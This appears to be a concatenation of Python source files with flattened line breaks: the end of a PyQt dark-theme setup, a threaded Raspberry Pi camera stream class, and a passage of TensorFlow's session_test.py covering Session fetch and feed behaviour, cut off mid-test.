LIGHT_PRIMARY = QColor(100, 100, 100) TERTIARY = QColor(42, 130, 218) dark_palette.setColor(QPalette.Window, PRIMARY) dark_palette.setColor(QPalette.WindowText, WHITE) dark_palette.setColor(QPalette.Base, SECONDARY) dark_palette.setColor(QPalette.AlternateBase, PRIMARY) dark_palette.setColor(QPalette.ToolTipBase, WHITE) dark_palette.setColor(QPalette.ToolTipText, WHITE) dark_palette.setColor(QPalette.Text, WHITE) dark_palette.setColor(QPalette.Button, LIGHT_PRIMARY) dark_palette.setColor(QPalette.ButtonText, WHITE) dark_palette.setColor(QPalette.BrightText, RED) dark_palette.setColor(QPalette.Link, TERTIARY) dark_palette.setColor(QPalette.Highlight, TERTIARY) dark_palette.setColor(QPalette.HighlightedText, BLACK) app.setPalette(dark_palette) app.setStyleSheet("QToolTip { color: #ffffff; background-color: #2a82da; border: 1px solid white; }") """ window = CollectorApp() window.show() app.exec_()
PiVideoStream.py
# import the necessary packages from picamera.array import PiRGBArray from picamera import PiCamera from threading import Thread class PiVideoStream: def __init__(self, resolution=(1296, 976), framerate=32): # initialize the camera and stream self.camera = PiCamera() self.camera.resolution = resolution self.camera.framerate = framerate self.rawCapture = PiRGBArray(self.camera, size=resolution) self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True) # _initialize the frame and the variable used to indicate # if the thread should be stopped self.frame = None self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped for f in self.stream: # grab the frame from the stream and clear the stream in # preparation for the next frame self.frame = f.array self.rawCapture.truncate(0) # if the thread indicator variable is set, stop the thread # and resource camera resources if self.stopped: self.stream.close() self.rawCapture.close() self.camera.close() return def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True
session_test.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.python.client.session.Session.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import random import os import sys import threading import time import warnings import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.framework import attr_value_pb2 from tensorflow.core.lib.core import error_codes_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.python.client import session from tensorflow.python.eager import context from tensorflow.python.framework import common_shapes from tensorflow.python.framework import config from tensorflow.python.framework import constant_op from tensorflow.python.framework import device as framework_device_lib from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import function from tensorflow.python.framework import importer from tensorflow.python.framework import ops from tensorflow.python.framework import sparse_tensor from tensorflow.python.framework import tensor_util from tensorflow.python.framework import test_util from tensorflow.python.framework import versions from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import data_flow_ops from tensorflow.python.ops import gen_control_flow_ops # Import gradients to resolve circular imports from tensorflow.python.ops import gradients # pylint: disable=unused-import from tensorflow.python.ops import gradients_impl from tensorflow.python.ops import math_ops # Import resource_variable_ops for the variables-to-tensor implicit conversion. from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.training import server_lib from tensorflow.python.util import compat try: import attr # pylint:disable=g-import-not-at-top except ImportError: attr = None # NOTE(mrry): Dummy shape registration for ops used in the tests, since they # don't have C++ op registrations on which to attach C++ shape fns. ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape) class SessionTest(test_util.TensorFlowTestCase): def setUp(self): super(SessionTest, self).setUp() warnings.simplefilter('always') def testUseExistingGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(graph=g): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testUseDefaultGraph(self): with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testCreate(self): with session.Session(): inp = constant_op.constant(10.0, shape=[2, 3], name='W1') copy = array_ops.identity(inp) # Test with feed. # TODO(mrry): Investigate why order='F' didn't work. arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C') copy_val = copy.eval({'W1:0': arr}) self.assertAllEqual(arr, copy_val) # Test without feed. copy_val = copy.eval() self.assertAllEqual( np.asarray( [[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32), copy_val) def testManyCPUs(self): with session.Session( config=config_pb2.ConfigProto(device_count={ 'CPU': 2, 'GPU': 0 })) as sess: inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) num_cpu_devices = 0 num_gpu_devices = 0 for device in sess.list_devices(): device_type = framework_device_lib.DeviceSpec.from_string( device.name).device_type if device_type == 'CPU': num_cpu_devices += 1 elif device_type == 'GPU': num_gpu_devices += 1 self.assertEqual(2, num_cpu_devices) self.assertEqual(0, num_gpu_devices) def testPerSessionThreads(self): with session.Session( config=config_pb2.ConfigProto(use_per_session_threads=True)): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testSessionInterOpThreadPool(self): config_pb = config_pb2.ConfigProto() pool = config_pb.session_inter_op_thread_pool.add() with session.Session(config=config_pb) as s: inp = constant_op.constant(10.0, name='W1') results = s.run([inp]) self.assertAllEqual([10.0], results) pool = config_pb.session_inter_op_thread_pool.add() pool.num_threads = 1 with session.Session(config=config_pb) as s: inp = constant_op.constant(20.0, name='W2') results = s.run([inp]) self.assertAllEqual([20.0], results) pool = config_pb.session_inter_op_thread_pool.add() pool.num_threads = 1 pool.global_name = 't1' run_options = config_pb2.RunOptions() run_options.inter_op_thread_pool = ( len(config_pb.session_inter_op_thread_pool) - 1) with session.Session(config=config_pb) as s: inp = constant_op.constant(30.0, name='W2') results = s.run([inp], options=run_options) self.assertAllEqual([30.0], results) def testErrorsReported(self): with session.Session() as s: constant_op.constant(10.0, name='W1') with self.assertRaises(ValueError): s.run('foo:0') def testErrorPayload(self): with session.Session(): a = array_ops.placeholder(dtypes.float32) with self.assertRaisesOpError(lambda e: e.op == a.op): a.eval() def testErrorCodeWithNoNodeDef(self): with session.Session() as s: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) def exc_predicate(e): return (e.op is None and e.node_def is None and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with self.assertRaisesOpError(exc_predicate): # Run with a bogus handle. s.partial_run('foo', r1, feed_dict={a: 1, b: 2}) def testErrorBasedOn(self): with session.Session() as sess: a = constant_op.constant(0.0, shape=[2, 3]) # NOTE(mrry): The original_op is nonsense, but used here to test that the # errors are reported correctly. with sess.graph._original_op(a.op): b = array_ops.identity(a, name='id') with sess.graph._original_op(b.op): c = array_ops.placeholder(dtypes.float32) def exc_predicate(e): return (e.op == c.op and e.op._original_op == b.op and e.op._original_op._original_op == a.op) with self.assertRaisesOpError(exc_predicate): c.eval() def testFetchNone(self): with session.Session() as s: a = constant_op.constant(1.0) with self.assertRaises(TypeError): s.run(None) with self.assertRaises(TypeError): s.run([None]) with self.assertRaises(TypeError): s.run({'b': None}) with self.assertRaises(TypeError): s.run({'a': a, 'b': None}) def testFetchSingleton(self): with session.Session() as sess: a = constant_op.constant(42.0) res = sess.run(a) self.assertEqual(42.0, res) res = sess.run(a.op) # An op, not a tensor. self.assertEqual(None, res) tensor_runner = sess.make_callable(a) res = tensor_runner() self.assertEqual(42.0, res) op_runner = sess.make_callable(a.op) res = op_runner() self.assertEqual(None, res) def testFetchSingletonByName(self): with session.Session() as sess: a = constant_op.constant(42.0) res = sess.run(a.name) self.assertEqual(42.0, res) res = sess.run(a.op) # An op, not a tensor. self.assertEqual(None, res) def testFetchList(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) v = variables.Variable([54.0]) assign = v.assign([63.0]) res = sess.run([a, b, c, a.name, assign.op]) self.assertTrue(isinstance(res, list)) self.assertEqual([42.0, None, 44.0, 42.0, None], res) list_runner = sess.make_callable([a, b, c, a.name, assign.op]) res = list_runner() self.assertTrue(isinstance(res, list)) self.assertEqual([42.0, None, 44.0, 42.0, None], res) def testFetchTuple(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run((a, b, c, a.name)) self.assertTrue(isinstance(res, tuple)) self.assertEqual((42.0, None, 44.0, 42.0), res) tuple_runner = sess.make_callable((a, b, c, a.name)) res = tuple_runner() self.assertTrue(isinstance(res, tuple)) self.assertEqual((42.0, None, 44.0, 42.0), res) def testFetchNamedTuple(self): # pylint: disable=invalid-name ABC = collections.namedtuple('ABC', ['a', 'b', 'c']) # pylint: enable=invalid-name with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run(ABC(a, b, c)) self.assertTrue(isinstance(res, ABC)) self.assertEqual(42.0, res.a) self.assertEqual(None, res.b) self.assertEqual(44.0, res.c) namedtuple_runner = sess.make_callable(ABC(a, b, c)) res = namedtuple_runner() self.assertTrue(isinstance(res, ABC)) self.assertEqual(42.0, res.a) self.assertEqual(None, res.b) self.assertEqual(44.0, res.c) def testFetchDict(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run({'a': a, 'b': b, 'c': c}) self.assertTrue(isinstance(res, dict)) self.assertEqual(42.0, res['a']) self.assertEqual(None, res['b']) self.assertEqual(44.0, res['c']) def testFetchOrderedDict(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)])) self.assertTrue(isinstance(res, collections.OrderedDict)) self.assertEqual([3, 2, 1], list(res.keys())) self.assertEqual(42.0, res[3]) self.assertEqual(None, res[2]) self.assertEqual(44.0, res[1]) @test_util.run_v1_only('b/120545219') def testFetchAttrs(self): if attr is None: self.skipTest('attr module is unavailable.') @attr.s class SampleAttr(object): field1 = attr.ib() field2 = attr.ib() val1 = np.array([1.2, 3.4, 5.6]) val2 = np.array([[1, 2], [4, 3]]) val3 = np.array([10, 20, 30]) t1 = constant_op.constant(val1) t2 = constant_op.constant(val2) sample = SampleAttr(t1, t2) with session.Session() as sess: result = sess.run(sample) self.assertIsInstance(result, SampleAttr) self.assertAllEqual(val1, result.field1) self.assertAllEqual(val2, result.field2) result = sess.run(sample, feed_dict={sample.field1: val3}) self.assertIsInstance(result, SampleAttr) self.assertAllEqual(val3, result.field1) self.assertAllEqual(val2, result.field2) @test_util.run_v1_only('b/120545219') def testFetchNestedAttrs(self): if attr is None: self.skipTest('attr module is unavailable.') @attr.s class SampleAttr(object): field0 = attr.ib() field1 = attr.ib() v1 = 10 v2 = 20 v3 = np.float32(1.2) v4 = np.float32(3.4) v5 = np.float64(100.001) v6 = np.float64(-23.451) arr1 = np.array([1.2, 6.7, 3.4]) arr2 = np.array([7, 11, 3]) sample = SampleAttr( SampleAttr( SampleAttr(constant_op.constant(v1), constant_op.constant(v2)), SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))), {'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)), 'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]}) with session.Session() as sess: result = sess.run(sample) self.assertIsInstance(result, SampleAttr) self.assertIsInstance(result.field0, SampleAttr) self.assertIsInstance(result.field0.field0, SampleAttr) self.assertIsInstance(result.field0.field1, SampleAttr) self.assertIsInstance(result.field0.field1.field0, np.ndarray) self.assertAllEqual(arr1, result.field0.field1.field0) self.assertIsInstance(result.field0.field1.field1, np.ndarray) self.assertAllEqual(arr2, result.field0.field1.field1) self.assertIsInstance(result.field1, dict) self.assertIn('A', result.field1) self.assertIn('B', result.field1) self.assertIsInstance(result.field1['A'], SampleAttr) self.assertAllEqual( [v3, v4], [result.field1['A'].field0, result.field1['A'].field1]) self.assertIsInstance(result.field1['B'], list) self.assertEqual(1, len(result.field1['B'])) self.assertIsInstance(result.field1['B'][0], SampleAttr) self.assertAllEqual( [v5, v6], [result.field1['B'][0].field0, result.field1['B'][0].field1]) def testFetchNestingEmptyOneLevel(self): with session.Session() as sess: a_val = 11.0 a = constant_op.constant(a_val) res = sess.run([[], tuple(), {}]) self.assertTrue(isinstance(res, list)) self.assertEquals(3, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(0, len(res[0])) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(0, len(res[1])) self.assertTrue(isinstance(res[2], dict)) self.assertEqual(0, len(res[2])) res = sess.run([[], tuple(), {}, a]) self.assertTrue(isinstance(res, list)) self.assertEquals(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(0, len(res[0])) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(0, len(res[1])) self.assertTrue(isinstance(res[2], dict)) self.assertEqual(0, len(res[2])) self.assertEqual(a_val, res[3]) def testFetchNestingOneLevel(self): with session.Session() as sess: # pylint: disable=invalid-name ABC = collections.namedtuple('ABC', ['a', 'b', 'c']) DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g']) # pylint: enable=invalid-name a_val = 42.0 b_val = None c_val = 44.0 a = constant_op.constant(a_val) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(c_val) # List of lists, tuples, namedtuple, and dict res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c), { 'a': a.name, 'c': c, 'b': b }]) self.assertTrue(isinstance(res, list)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(3, len(res[0])) self.assertEqual(a_val, res[0][0]) self.assertEqual(b_val, res[0][1]) self.assertEqual(c_val, res[0][2]) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(3, len(res[1])) self.assertEqual(a_val, res[1][0]) self.assertEqual(b_val, res[1][1]) self.assertEqual(c_val, res[1][2]) self.assertTrue(isinstance(res[2], ABC)) self.assertEqual(a_val, res[2].a) self.assertEqual(b_val, res[2].b) self.assertEqual(c_val, res[2].c) self.assertTrue(isinstance(res[3], dict)) self.assertEqual(3, len(res[3])) self.assertEqual(a_val, res[3]['a']) self.assertEqual(b_val, res[3]['b']) self.assertEqual(c_val, res[3]['c']) # Tuple of lists, tuples, namedtuple, and dict res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), { 'a': a, 'c': c, 'b': b })) self.assertTrue(isinstance(res, tuple)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(3, len(res[0])) self.assertEqual(a_val, res[0][0]) self.assertEqual(b_val, res[0][1]) self.assertEqual(c_val, res[0][2]) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(3, len(res[1])) self.assertEqual(a_val, res[1][0]) self.assertEqual(b_val, res[1][1]) self.assertEqual(c_val, res[1][2]) self.assertTrue(isinstance(res[2], ABC)) self.assertEqual(a_val, res[2].a) self.assertEqual(b_val, res[2].b) self.assertEqual(c_val, res[2].c) self.assertTrue(isinstance(res[3], dict)) self.assertEqual(3, len(res[3])) self.assertEqual(a_val, res[3]['a']) self.assertEqual(b_val, res[3]['b']) self.assertEqual(c_val, res[3]['c']) # Namedtuple of lists, tuples, namedtuples, and dict res = sess.run( DEFG( d=[a, b, c], e=(a, b, c), f=ABC(a=a.name, b=b, c=c), g={ 'a': a, 'c': c, 'b': b })) self.assertTrue(isinstance(res, DEFG)) self.assertTrue(isinstance(res.d, list)) self.assertEqual(3, len(res.d)) self.assertEqual(a_val, res.d[0]) self.assertEqual(b_val, res.d[1]) self.assertEqual(c_val, res.d[2]) self.assertTrue(isinstance(res.e, tuple)) self.assertEqual(3, len(res.e)) self.assertEqual(a_val, res.e[0]) self.assertEqual(b_val, res.e[1]) self.assertEqual(c_val, res.e[2]) self.assertTrue(isinstance(res.f, ABC)) self.assertEqual(a_val, res.f.a) self.assertEqual(b_val, res.f.b) self.assertEqual(c_val, res.f.c) self.assertTrue(isinstance(res.g, dict)) self.assertEqual(3, len(res.g)) self.assertEqual(a_val, res.g['a']) self.assertEqual(b_val, res.g['b']) self.assertEqual(c_val, res.g['c']) # Dict of lists, tuples, namedtuples, and dict res = sess.run({ 'd': [a, b, c], 'e': (a, b, c), 'f': ABC(a=a, b=b, c=c), 'g': { 'a': a.name, 'c': c, 'b': b } }) self.assertTrue(isinstance(res, dict)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res['d'], list)) self.assertEqual(3, len(res['d'])) self.assertEqual(a_val, res['d'][0]) self.assertEqual(b_val, res['d'][1]) self.assertEqual(c_val, res['d'][2]) self.assertTrue(isinstance(res['e'], tuple)) self.assertEqual(3, len(res['e'])) self.assertEqual(a_val, res['e'][0]) self.assertEqual(b_val, res['e'][1]) self.assertEqual(c_val, res['e'][2]) self.assertTrue(isinstance(res['f'], ABC)) self.assertEqual(a_val, res['f'].a) self.assertEqual(b_val, res['f'].b) self.assertEqual(c_val, res['f'].c) self.assertTrue(isinstance(res['g'], dict)) self.assertEqual(3, len(res['g'])) self.assertEqual(a_val, res['g']['a']) self.assertEqual(b_val, res['g']['b']) self.assertEqual(c_val, res['g']['c']) def testFetchTensorObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) results_with_list = s.run([c]) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0]) results_with_single = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single) results_with_get = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get) a_val, b_val = s.run([a, b]) # Test multiple fetches. self.assertAllEqual([[1.0, 1.0]], a_val) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val) results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]}) self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0]) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], results_with_dict['b']) self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0]) self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1]) # Test nested structures results_with_nested_list = s.run([[[a, b], b], a, [a, b]]) self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0]) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], results_with_nested_list[0][0][1]) self.assertAllEqual(results_with_nested_list[0][0][0], results_with_nested_list[1]) self.assertAllEqual(results_with_nested_list[1], results_with_nested_list[2][0]) self.assertAllEqual(results_with_nested_list[0][0][1], results_with_nested_list[0][1]) self.assertAllEqual(results_with_nested_list[0][1], results_with_nested_list[2][1]) def testFetchScalar(self): with session.Session() as s: for scalar in np.int32, np.int64, np.float16, np.float32, np.float64: x = scalar(7) y = scalar(8) tf_x = constant_op.constant(x, shape=[]) tf_y = constant_op.constant(y) tf_xy = math_ops.add(tf_x, tf_y) # Single fetch xy = s.run(tf_xy) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # List fetch xy, = s.run([tf_xy]) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # Dict fetch xy = s.run({'xy': tf_xy})['xy'] self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # Nested list fetch xy = s.run([[[tf_xy]], tf_xy, [tf_xy]]) self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]]) self.assertEqual(scalar, type(xy[0][0][0])) self.assertEqual(scalar, type(xy[1])) self.assertEqual(scalar, type(xy[2][0])) def testFetchOperationObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) v = variables.Variable(a, name='testFetchOperationObject_v') s.run(v.initializer) v_val = s.run(v) self.assertAllEqual([[1.0, 1.0]], v_val) def testFetchSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = sparse_tensor.SparseTensor( constant_op.constant(indices), constant_op.constant(values), constant_op.constant(shape)) # Single fetch, use as tuple sp_out = s.run(sp) indices_out, values_out, shape_out = sp_out self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Single fetch, use as SparseTensorValue sp_out = s.run(sp) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Tuple fetch, use as tuple indices_out, values_out, shape_out = s.run(sp) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as tuple (indices_out, values_out, shape_out), = s.run([sp]) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as SparseTensorValue sp_out, = s.run([sp]) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Dict fetch (single value), use as tuple indices_out, values_out, shape_out = s.run({'sp': sp})['sp'] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Dict fetch (list value), use as tuple (indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp'] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Dict fetch, use as SparseTensorValue sp_out = s.run({'sp': sp})['sp'] self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Nested list fetch use as tuple sp_out = s.run([[[sp]], sp]) indices_out, values_out, shape_out = sp_out[0][0][0] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) indices_out, values_out, shape_out = sp_out[1] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Nested list fetch, use as SparseTensorValue sp_out = s.run([[[sp]], sp]) self.assertAllEqual(sp_out[0][0][0].indices, indices) self.assertAllEqual(sp_out[0][0][0].values, values) self.assertAllEqual(sp_out[0][0][0].dense_shape, shape) self.assertAllEqual(sp_out[1].indices, indices) self.assertAllEqual(sp_out[1].values, values) self.assertAllEqual(sp_out[1].dense_shape, shape) def testFeedSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = sparse_tensor.SparseTensor( array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(3,)), ) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with tuple, fetch sp directly sp_out = s.run(sp, {sp: (indices, values, shape)}) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) # Feed SparseTensorValue and fetch sp directly. sp_out = s.run(sp, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) def testFeedSparsePlaceholder(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1') sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) def testFeedSparsePlaceholderPartialShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder( shape=[None, 9, 2], dtype=np.float32, name='placeholder1') sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Feed with SparseTensorValue, fetch SparseTensorValue sp2_out = s.run(sp2, { sp: sparse_tensor.SparseTensorValue(indices, values, shape) }) self.assertAllEqual(sp2_out.indices, indices) self.assertAllEqual(sp2_out.values, values) self.assertAllEqual(sp2_out.dense_shape, shape) def testFeedSparsePlaceholderConstantShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = np.array([7, 9, 2]).astype(np.int64) sp = array_ops.sparse_placeholder( dtype=np.float32, shape=shape, name='placeholder1') self.assertAllEqual(sp.dense_shape.eval(session=s), shape) self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape) sp_indices = array_ops.identity(sp.indices) sp_values = array_ops.identity(sp.values) sp_shape = array_ops.identity(sp.dense_shape) # Feed with tuple indices_out, values_out, shape_out = s.run( [sp_indices, sp_values, sp_shape], { sp: (indices, values) }) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) def testFetchIndexedSlices(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = np.array([7, 9, 2]).astype(np.int64) ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), constant_op.constant(dense_shape)) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlices(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = np.array([7, 9, 